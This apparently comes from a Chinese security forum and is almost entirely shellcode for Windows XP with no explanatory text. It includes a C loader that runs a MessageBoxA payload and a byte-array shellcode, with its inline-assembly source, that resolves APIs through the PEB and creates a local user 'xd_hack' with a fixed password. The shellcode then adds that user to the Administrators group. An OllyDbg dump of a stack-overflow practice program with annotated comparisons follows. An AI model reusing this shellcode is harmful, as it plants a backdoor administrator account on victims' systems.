#include <stdio.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x51\x68\x6c\x6c\x20\x20\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72"
"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" // 0x7c801d7b ; LoadLibraryA(user32.dll)
"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
"\xc1\x11\x11\x11\x11\x51\x68\x61"
"\x67\x65\x42\x68\x4d\x65\x73\x73"
"\x89\xe1\x51\x50\xbb\x40\xae\x80" //0x7c80ae40;GetProcAddress(user32.dll, //MessageBoxA)
"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
"\x51\x51\x52\xff\xd0\x31\xc0\x50"
"\xb8\x12\xcb\x81\x7c\xff\xd0"; // 0x7c81cb12 ; ExitProcess(0)
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) &shellcode;
printf("Shellcode Length is : %d",strlen(shellcode));
(int)(*func)();
}
#include "stdafx.h"
#include <windows.h>
#include <lm.h>
DWORD (WINAPI *IsNetLocalGroupAddMembers)(
LPCWSTR servername,
LPCWSTR groupname,
DWORD level,
LPBYTE buf,
DWORD totalentries
);
DWORD (WINAPI *IsNetUserAdd)(
LPCWSTR servername,
DWORD level,
LPBYTE buf,
LPDWORD parm_err
);
BYTE szCmdShell[] =
{
0xc6, 0x45, 0xb0, 0x64, 0xc6, 0x45, 0xb1, 0xa1, 0xc6, 0x45, 0xb2, 0x30, 0xc6, 0x45, 0xb3, 0x00,
0xc6, 0x45, 0xb4, 0x00, 0xc6, 0x45, 0xb5, 0x00, 0xc6, 0x45, 0xb6, 0x8b, 0xc6, 0x45, 0xb7, 0x40,
0xc6, 0x45, 0xb8, 0x0c, 0xc6, 0x45, 0xb9, 0x8b, 0xc6, 0x45, 0xba, 0x70, 0xc6, 0x45, 0xbb, 0x1c,
0xc6, 0x45, 0xbc, 0xad, 0xc6, 0x45, 0xbd, 0x8b, 0xc6, 0x45, 0xbe, 0x40, 0xc6, 0x45, 0xbf, 0x08,
0xc6, 0x45, 0xc0, 0x8b, 0xc6, 0x45, 0xc1, 0xe8, 0xc6, 0x45, 0xc2, 0x8b, 0xc6, 0x45, 0xc3, 0x45,
0xc6, 0x45, 0xc4, 0x3c, 0xc6, 0x45, 0xc5, 0x8b, 0xc6, 0x45, 0xc6, 0x54, 0xc6, 0x45, 0xc7, 0x28,
0xc6, 0x45, 0xc8, 0x78, 0xc6, 0x45, 0xc9, 0x03, 0xc6, 0x45, 0xca, 0xd5, 0xc6, 0x45, 0xcb, 0x8b,
0xc6, 0x45, 0xcc, 0x4a, 0xc6, 0x45, 0xcd, 0x18, 0xc6, 0x45, 0xce, 0x8b, 0xc6, 0x45, 0xcf, 0x5a,
0xc6, 0x45, 0xd0, 0x20, 0xc6, 0x45, 0xd1, 0x03, 0xc6, 0x45, 0xd2, 0xdd, 0xc6, 0x45, 0xd3, 0x49,
0xc6, 0x45, 0xd4, 0x8b, 0xc6, 0x45, 0xd5, 0x34, 0xc6, 0x45, 0xd6, 0x8b, 0xc6, 0x45, 0xd7, 0x03,
0xc6, 0x45, 0xd8, 0xf5, 0xc6, 0x45, 0xd9, 0xb8, 0xc6, 0x45, 0xda, 0x47, 0xc6, 0x45, 0xdb, 0x65,
0xc6, 0x45, 0xdc, 0x74, 0xc6, 0x45, 0xdd, 0x50, 0xc6, 0x45, 0xde, 0x39, 0xc6, 0x45, 0xdf, 0x06,
0xc6, 0x45, 0xe0, 0x75, 0xc6, 0x45, 0xe1, 0xf1, 0xc6, 0x45, 0xe2, 0xb8, 0xc6, 0x45, 0xe3, 0x72,
0xc6, 0x45, 0xe4, 0x6f, 0xc6, 0x45, 0xe5, 0x63, 0xc6, 0x45, 0xe6, 0x41, 0xc6, 0x45, 0xe7, 0x39,
0xc6, 0x45, 0xe8, 0x46, 0xc6, 0x45, 0xe9, 0x04, 0xc6, 0x45, 0xea, 0x75, 0xc6, 0x45, 0xeb, 0xe7,
0xc6, 0x45, 0xec, 0x8b, 0xc6, 0x45, 0xed, 0x5a, 0xc6, 0x45, 0xee, 0x24, 0xc6, 0x45, 0xef, 0x03,
0xc6, 0x45, 0xf0, 0xdd, 0xc6, 0x45, 0xf1, 0x66, 0xc6, 0x45, 0xf2, 0x8b, 0xc6, 0x45, 0xf3, 0x0c,
0xc6, 0x45, 0xf4, 0x4b, 0xc6, 0x45, 0xf5, 0x8b, 0xc6, 0x45, 0xf6, 0x5a, 0xc6, 0x45, 0xf7, 0x1c,
0xc6, 0x45, 0xf8, 0x03, 0xc6, 0x45, 0xf9, 0xdd, 0xc6, 0x45, 0xfa, 0x8b, 0xc6, 0x45, 0xfb, 0x04,
0xc6, 0x45, 0xfc, 0x8b, 0xc6, 0x45, 0xfd, 0x03, 0xc6, 0x45, 0xfe, 0xc5, 0xc6, 0x45, 0xff, 0xc3,
0x66, 0xc7, 0x45, 0xa0, 0x78, 0x00, 0x66, 0xc7, 0x45, 0xa2, 0x64, 0x00, 0x66, 0xc7, 0x45, 0xa4,
0x5f, 0x00, 0x66, 0xc7, 0x45, 0xa6, 0x68, 0x00, 0x66, 0xc7, 0x45, 0xa8, 0x61, 0x00, 0x66, 0xc7,
0x45, 0xaa, 0x63, 0x00, 0x66, 0xc7, 0x45, 0xac, 0x6b, 0x00, 0x66, 0xc7, 0x45, 0xae, 0x00, 0x00,
0x66, 0xc7, 0x45, 0x90, 0x53, 0x00, 0x66, 0xc7, 0x45, 0x92, 0x75, 0x00, 0x66, 0xc7, 0x45, 0x94,
0x63, 0x00, 0x66, 0xc7, 0x45, 0x96, 0x63, 0x00, 0x66, 0xc7, 0x45, 0x98, 0x65, 0x00, 0x66, 0xc7,
0x45, 0x9a, 0x73, 0x00, 0x66, 0xc7, 0x45, 0x9c, 0x73, 0x00, 0x66, 0xc7, 0x45, 0x9e, 0x00, 0x00,
0xc6, 0x45, 0x84, 0x4f, 0xc6, 0x45, 0x85, 0x76, 0xc6, 0x45, 0x86, 0x65, 0xc6, 0x45, 0x87, 0x72,
0xc6, 0x45, 0x88, 0x66, 0xc6, 0x45, 0x89, 0x6c, 0xc6, 0x45, 0x8a, 0x6f, 0xc6, 0x45, 0x8b, 0x77,
0xc6, 0x45, 0x8c, 0x00, 0xc6, 0x85, 0x74, 0xff, 0xff, 0xff, 0x45, 0xc6, 0x85, 0x75, 0xff, 0xff,
0xff, 0x78, 0xc6, 0x85, 0x76, 0xff, 0xff, 0xff, 0x70, 0xc6, 0x85, 0x77, 0xff, 0xff, 0xff, 0x6f,
0xc6, 0x85, 0x78, 0xff, 0xff, 0xff, 0x69, 0xc6, 0x85, 0x79, 0xff, 0xff, 0xff, 0x74, 0xc6, 0x85,
0x7a, 0xff, 0xff, 0xff, 0x20, 0xc6, 0x85, 0x7b, 0xff, 0xff, 0xff, 0x73, 0xc6, 0x85, 0x7c, 0xff,
0xff, 0xff, 0x75, 0xc6, 0x85, 0x7d, 0xff, 0xff, 0xff, 0x63, 0xc6, 0x85, 0x7e, 0xff, 0xff, 0xff,
0x65, 0xc6, 0x85, 0x7f, 0xff, 0xff, 0xff, 0x73, 0xc6, 0x45, 0x80, 0x73, 0xc6, 0x45, 0x81, 0x00,
0xc6, 0x85, 0x64, 0xff, 0xff, 0xff, 0x6e, 0xc6, 0x85, 0x65, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85,
0x66, 0xff, 0xff, 0xff, 0x74, 0xc6, 0x85, 0x67, 0xff, 0xff, 0xff, 0x61, 0xc6, 0x85, 0x68, 0xff,
0xff, 0xff, 0x70, 0xc6, 0x85, 0x69, 0xff, 0xff, 0xff, 0x69, 0xc6, 0x85, 0x6a, 0xff, 0xff, 0xff,
0x33, 0xc6, 0x85, 0x6b, 0xff, 0xff, 0xff, 0x32, 0xc6, 0x85, 0x6c, 0xff, 0xff, 0xff, 0x2e, 0xc6,
0x85, 0x6d, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x6e, 0xff, 0xff, 0xff, 0x6c, 0xc6, 0x85, 0x6f,
0xff, 0xff, 0xff, 0x6c, 0xc6, 0x85, 0x70, 0xff, 0xff, 0xff, 0x00, 0x66, 0xc7, 0x85, 0x44, 0xff,
0xff, 0xff, 0x41, 0x00, 0x66, 0xc7, 0x85, 0x46, 0xff, 0xff, 0xff, 0x64, 0x00, 0x66, 0xc7, 0x85,
0x48, 0xff, 0xff, 0xff, 0x6d, 0x00, 0x66, 0xc7, 0x85, 0x4a, 0xff, 0xff, 0xff, 0x69, 0x00, 0x66,
0xc7, 0x85, 0x4c, 0xff, 0xff, 0xff, 0x6e, 0x00, 0x66, 0xc7, 0x85, 0x4e, 0xff, 0xff, 0xff, 0x69,
0x00, 0x66, 0xc7, 0x85, 0x50, 0xff, 0xff, 0xff, 0x73, 0x00, 0x66, 0xc7, 0x85, 0x52, 0xff, 0xff,
0xff, 0x74, 0x00, 0x66, 0xc7, 0x85, 0x54, 0xff, 0xff, 0xff, 0x72, 0x00, 0x66, 0xc7, 0x85, 0x56,
0xff, 0xff, 0xff, 0x61, 0x00, 0x66, 0xc7, 0x85, 0x58, 0xff, 0xff, 0xff, 0x74, 0x00, 0x66, 0xc7,
0x85, 0x5a, 0xff, 0xff, 0xff, 0x6f, 0x00, 0x66, 0xc7, 0x85, 0x5c, 0xff, 0xff, 0xff, 0x72, 0x00,
0x66, 0xc7, 0x85, 0x5e, 0xff, 0xff, 0xff, 0x73, 0x00, 0x66, 0xc7, 0x85, 0x60, 0xff, 0xff, 0xff,
0x00, 0x00, 0xc6, 0x85, 0x38, 0xff, 0xff, 0xff, 0x4e, 0xc6, 0x85, 0x39, 0xff, 0xff, 0xff, 0x65,
0xc6, 0x85, 0x3a, 0xff, 0xff, 0xff, 0x74, 0xc6, 0x85, 0x3b, 0xff, 0xff, 0xff, 0x55, 0xc6, 0x85,
0x3c, 0xff, 0xff, 0xff, 0x73, 0xc6, 0x85, 0x3d, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x3e, 0xff,
0xff, 0xff, 0x72, 0xc6, 0x85, 0x3f, 0xff, 0xff, 0xff, 0x41, 0xc6, 0x85, 0x40, 0xff, 0xff, 0xff,
0x64, 0xc6, 0x85, 0x41, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x42, 0xff, 0xff, 0xff, 0x00, 0xc6,
0x85, 0x20, 0xff, 0xff, 0xff, 0x4e, 0xc6, 0x85, 0x21, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x22,
0xff, 0xff, 0xff, 0x74, 0xc6, 0x85, 0x23, 0xff, 0xff, 0xff, 0x4c, 0xc6, 0x85, 0x24, 0xff, 0xff,
0xff, 0x6f, 0xc6, 0x85, 0x25, 0xff, 0xff, 0xff, 0x63, 0xc6, 0x85, 0x26, 0xff, 0xff, 0xff, 0x61,
0xc6, 0x85, 0x27, 0xff, 0xff, 0xff, 0x6c, 0xc6, 0x85, 0x28, 0xff, 0xff, 0xff, 0x47, 0xc6, 0x85,
0x29, 0xff, 0xff, 0xff, 0x72, 0xc6, 0x85, 0x2a, 0xff, 0xff, 0xff, 0x6f, 0xc6, 0x85, 0x2b, 0xff,
0xff, 0xff, 0x75, 0xc6, 0x85, 0x2c, 0xff, 0xff, 0xff, 0x70, 0xc6, 0x85, 0x2d, 0xff, 0xff, 0xff,
0x41, 0xc6, 0x85, 0x2e, 0xff, 0xff, 0xff, 0x64, 0xc6, 0x85, 0x2f, 0xff, 0xff, 0xff, 0x64, 0xc6,
0x85, 0x30, 0xff, 0xff, 0xff, 0x4d, 0xc6, 0x85, 0x31, 0xff, 0xff, 0xff, 0x65, 0xc6, 0x85, 0x32,
0xff, 0xff, 0xff, 0x6d, 0xc6, 0x85, 0x33, 0xff, 0xff, 0xff, 0x62, 0xc6, 0x85, 0x34, 0xff, 0xff,
0xff, 0x65, 0xc6, 0x85, 0x35, 0xff, 0xff, 0xff, 0x72, 0xc6, 0x85, 0x36, 0xff, 0xff, 0xff, 0x73,
0xc6, 0x85, 0x37, 0xff, 0xff, 0xff, 0x00, 0xc7, 0x85, 0x1c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
0x00, 0xc7, 0x85, 0x18, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x14, 0xff, 0xff,
0xff, 0x00, 0x00, 0x00, 0x00, 0x55, 0x8d, 0x85, 0xb0, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x5d, 0x89,
0x85, 0x14, 0xff, 0xff, 0xff, 0xc7, 0x85, 0x10, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8d,
0x85, 0x64, 0xff, 0xff, 0xff, 0x50, 0xb8, 0x7b, 0x1d, 0x80, 0x7c, 0xff, 0xd0, 0x89, 0x85, 0x10,
0xff, 0xff, 0xff, 0x8d, 0x85, 0x38, 0xff, 0xff, 0xff, 0x50, 0x8b, 0x85, 0x10, 0xff, 0xff, 0xff,
0x50, 0x8b, 0x85, 0x14, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x89, 0x85, 0x1c, 0xff, 0xff, 0xff, 0x8d,
0x85, 0x20, 0xff, 0xff, 0xff, 0x50, 0x8b, 0x85, 0x10, 0xff, 0xff, 0xff, 0x50, 0x8b, 0x85, 0x14,
0xff, 0xff, 0xff, 0xff, 0xd0, 0x89, 0x85, 0x18, 0xff, 0xff, 0xff, 0xc7, 0x85, 0x0c, 0xff, 0xff,
0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xb9,
0x07, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x8d, 0xbd, 0xf0, 0xfe, 0xff, 0xff, 0xf3, 0xab, 0x8d, 0x45,
0xa0, 0x89, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x8d, 0x4d, 0x90, 0x89, 0x8d, 0xf0, 0xfe, 0xff, 0xff,
0xc7, 0x85, 0xf8, 0xfe, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe8, 0xfe, 0xff, 0xff,
0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xa0, 0x89, 0x95, 0xe8, 0xfe, 0xff, 0xff, 0x8d, 0x85, 0x0c,
0xff, 0xff, 0xff, 0x50, 0x8d, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x50, 0x6a, 0x01, 0x6a, 0x00, 0x8b,
0x85, 0x1c, 0xff, 0xff, 0xff, 0xff, 0xd0, 0x6a, 0x01, 0x8d, 0x85, 0xe8, 0xfe, 0xff, 0xff, 0x50,
0x6a, 0x03, 0x8d, 0x85, 0x44, 0xff, 0xff, 0xff, 0x50, 0x6a, 0x00, 0x8b, 0x85, 0x18, 0xff, 0xff,
0xff, 0xff, 0xd0, 0x6a, 0x40, 0x8d, 0x85, 0x84, 0xff, 0xff, 0xff, 0x50, 0x8d, 0x85, 0x74, 0xff,
0xff, 0xff, 0x50, 0x6a, 0x00, 0xb8, 0xea, 0x07, 0xd5, 0x77, 0xff, 0xd0, 0xc3/*
0x6a, 0xff, 0xb8, 0x12,
0xcb, 0x81, 0x7c, 0xff, 0xd0*/
};
int main(int argc, wchar_t *argv[])
{
_asm
{
push ebp
mov ebp, esp
sub esp, 0x308
lea eax, szCmdShell
call eax
mov esp, ebp
pop ebp
}
return 0;
// 下面的,我是先用C实现,发现提取出来的有重定位问题,
// 然后部分换成汇编的.就解决了.
// 除了Kernel32!ExitProcess 和 User32!MessageBoxA 是硬编码的
// 其它的全部是从TEP里面取的.
// GetProcAddress
BYTE szGetProcAddress[] =
{
0x64, 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x40, 0x08,
0x8b, 0xe8, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x28, 0x78, 0x03, 0xd5, 0x8b, 0x4a, 0x18, 0x8b, 0x5a,
0x20, 0x03, 0xdd, 0x49, 0x8b, 0x34, 0x8b, 0x03, 0xf5, 0xb8, 0x47, 0x65, 0x74, 0x50, 0x39, 0x06,
0x75, 0xf1, 0xb8, 0x72, 0x6f, 0x63, 0x41, 0x39, 0x46, 0x04, 0x75, 0xe7, 0x8b, 0x5a, 0x24, 0x03,
0xdd, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x03, 0xdd, 0x8b, 0x04, 0x8b, 0x03, 0xc5, 0xc3
};
wchar_t szName[] = {0x78, 0x64, 0x5f, 0x68, 0x61, 0x63, 0x6b, 0x00};
wchar_t szPass[] = {0x53, 0x75, 0x63, 0x63, 0x65, 0x73, 0x73, 0x00};
char szCaption[] = {0x4f, 0x76, 0x65, 0x72, 0x66, 0x6c, 0x6f, 0x77, 0x00};
char szContent[] = {0x45, 0x78, 0x70, 0x6f, 0x69, 0x74, 0x20, 0x73, 0x75, 0x63, 0x65, 0x73, 0x73, 0x00};
char szNetapi32[] = {0x6e, 0x65, 0x74, 0x61, 0x70, 0x69, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00};
wchar_t szAdministroatr[] = {0x41, 0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x73, 0x00};
char szNetUserAdd[] = {0x4e, 0x65, 0x74, 0x55, 0x73, 0x65, 0x72, 0x41, 0x64, 0x64, 0x00};
char szNetLocalGroupAddMembers[] = {
0x4e, 0x65, 0x74, 0x4c, 0x6f, 0x63, 0x61, 0x6c, 0x47, 0x72, 0x6f, 0x75, 0x70, 0x41, 0x64, 0x64,
0x4d, 0x65, 0x6d, 0x62, 0x65, 0x72, 0x73, 0x00};
DWORD dwNetUserAdd = 0;
DWORD dwNetLocalGroupAddMembers = 0;
DWORD dwGetProcAddress = 0;
_asm
{
push ebp
lea eax, szGetProcAddress
call eax
pop ebp
mov dwGetProcAddress, eax
}
//HMODULE hNetAddress = (HMODULE)LoadLibraryA(szNetapi32);
HMODULE hNetAddress = NULL;
_asm
{
lea eax, szNetapi32
push eax
mov eax, 0x7C801D7B
call eax
mov hNetAddress, eax
}
// IsNetUserAdd = (DWORD (WINAPI *)(LPCWSTR, DWORD, LPBYTE, LPDWORD))
// GetProcAddress(hNetAddress, "NetUserAdd");
_asm
{
lea eax, szNetUserAdd
push eax
mov eax, hNetAddress
push eax
mov eax, dwGetProcAddress
call eax
mov dwNetUserAdd, eax
}
//
// IsNetLocalGroupAddMembers = (DWORD (WINAPI *)(LPCWSTR, LPCWSTR, DWORD, LPBYTE, DWORD))
// GetProcAddress(hNetAddress, "NetLocalGroupAddMembers");
_asm
{
lea eax, szNetLocalGroupAddMembers
push eax
mov eax, hNetAddress
push eax
mov eax, dwGetProcAddress
call eax
mov dwNetLocalGroupAddMembers, eax
}
DWORD dwError = 0;
USER_INFO_1 tagInfo = {0};
tagInfo.usri1_name = szName;
tagInfo.usri1_password = szPass;
tagInfo.usri1_priv = USER_PRIV_USER;
LOCALGROUP_MEMBERS_INFO_3 tagLocalgroup = {0};
tagLocalgroup.lgrmi3_domainandname = szName;
//IsNetUserAdd(NULL, 1, (PUCHAR)&tagInfo, &dwError);
_asm
{
lea eax, dwError
push eax
lea eax, tagInfo
push eax
push 1
push 0
mov eax, dwNetUserAdd
call eax
}
//IsNetLocalGroupAddMembers(NULL, szAdministroatr, 3, (PUCHAR)&tagLocalgroup, 1);
_asm
{
push 1
lea eax, tagLocalgroup
push eax
push 3
lea eax, szAdministroatr
push eax
push 0
mov eax, dwNetLocalGroupAddMembers
call eax
}
//MessageBox(NULL, szContent, szCaption, MB_ICONINFORMATION);
_asm
{
push 0x40
lea eax, szCaption
push eax
lea eax, szContent
push eax
push 0
mov eax, 0x77D507EA
call eax
}
//ExitProcess(-1);
_asm
{
push -1
mov eax, 0x7C81CB12
call eax
}
return 0;
}
00401010 |> \55 push ebp
00401011 |. 8BEC mov ebp,esp
00401013 |. 83EC 58 sub esp,58
00401016 |. 53 push ebx
00401017 |. 56 push esi
00401018 |. 57 push edi
00401019 |. 8D7D A8 lea edi,[local.22]
0040101C |. B9 16000000 mov ecx,16
00401021 |. B8 CCCCCCCC mov eax,CCCCCCCC
00401026 |. F3:AB rep stos dword ptr es:[edi]
00401028 |. C745 FC DDCCB>mov [local.1],AABBCCDD
0040102F |. C745 F8 AADDC>mov [local.2],BBCCDDAA
00401036 |. C745 F4 CCBBA>mov [local.3],DDAABBCC
0040103D |. C745 F0 DDAAB>mov [local.4],CCBBAADD
00401044 |. 66:A1 2C50420>mov ax,word ptr ds:[42502C]
0040104A |. 66:8945 E8 mov word ptr ss:[ebp-18],ax
0040104E |. 33C9 xor ecx,ecx
00401050 |. 894D EA mov dword ptr ss:[ebp-16],ecx
00401053 |. 66:894D EE mov word ptr ss:[ebp-12],cx
00401057 |. 68 DC5F4200 push exploit_.00425FDC ; please input the string:
0040105C |. E8 FFE80000 call exploit_.0040F960
00401061 |. 83C4 04 add esp,4
00401064 |. 8D55 E8 lea edx,[local.6]
00401067 |. 52 push edx
00401068 |. 68 28504200 push exploit_.00425028 ; %s
0040106D |. E8 7E000000 call exploit_.004010F0 ; // 这里调用ReadFile读取用户输入的信息
00401072 |. 83C4 08 add esp,8 ; // _cdecl约定,函数外平衡
00401075 |. 817D FC AADDC>cmp [local.1],BBCCDDAA ; // 这里拿0xBBCCDDAA 和我们输入的 0x36353433 做比较,
0040107C |. 75 38 jnz short exploit_.004010B6 ; // 不相等,就跳走
0040107E |. 817D F8 CCBBA>cmp [local.2],DDAABBCC ; // 这里拿0xDDAABBCC 和我们输入的 0x32313938 做比较,
00401085 |. 75 2F jnz short exploit_.004010B6 ; // 不相等,就跳走
00401087 |. 817D F4 DDAAB>cmp [local.3],CCBBAADD ; // 这里拿0xCCBBAADD 和我们输入的 0x37363534 做比较,
0040108E |. 75 26 jnz short exploit_.004010B6 ; // 不相等,就跳走
00401090 |. 817D F0 DDCCB>cmp [local.4],AABBCCDD ; // 这里拿0xAABBCCDD 和我们输入的 0x33323139 做比较,
00401097 |. 75 1D jnz short exploit_.004010B6 ; // 不相等,就跳走
00401099 |. 8BF4 mov esi,esp ; // 搞掂 :)
0040109B |. 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
0040109D |. 68 1C504200 push exploit_.0042501C ; |Exploit2
004010A2 |. 68 D05F4200 push exploit_.00425FD0 ; |Success!
004010A7 |. 6A 00 push 0 ; |hOwner = NULL
004010A9 |. FF15 B4D24200 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
004010AF |. 3BF4 cmp esi,esp
004010B1 |. E8 9A000000 call exploit_.00401150
004010B6 |> 5F pop edi
004010B7 |. 5E pop esi
004010B8 |. 5B pop ebx
004010B9 |. 83C4 58 add esp,58
004010BC |. 3BEC cmp ebp,esp
004010BE |. E8 8D000000 call exploit_.00401150
004010C3 |. 8BE5 mov esp,ebp
004010C5 |. 5D pop ebp
004010C6 \. C3 retn
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
V5 八爷
:)
